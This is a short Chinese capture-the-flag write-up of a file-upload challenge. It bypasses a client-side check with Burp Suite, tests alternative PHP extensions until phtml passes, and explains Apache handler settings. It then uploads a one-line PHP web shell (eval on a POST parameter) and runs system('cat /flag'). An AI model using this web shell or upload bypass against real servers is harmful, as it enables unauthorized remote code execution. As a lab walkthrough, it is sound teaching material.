目录
题目:
打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞
分析:
先随便上传一个文件,发现提示
并且bp抓包并没有抓到包,说明为前端检测过滤。
那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。
先上传一个jpg文件,内容为<?php phpinfo();?>。
发现后端还是进行了检查过滤
那就试试其他几种后缀:
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht,这些后缀名都可以被当做php文件执行(需要配置文件里面的支持)
1、例如Apache的 httpd.conf 中有如下配置代码:
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
2、或者.htaccess文件内容:
SetHandler application/x-httpd-php
意思是设置当前所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范,就会被当做PHP执行。不符合则报错。
phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析
PHT文件是一个HTML页面,其中包括一个PHP脚本
发现只有phtml满足绕过并且能够执行php代码
访问这个文件
成功执行。
将将文件内容改成<?php eval($_POST[1]);?>重新上传
访问文件,post传入:1=system('cat /flag');
这题不能上传.htaccess文件,因为上传文件后会修改文件名。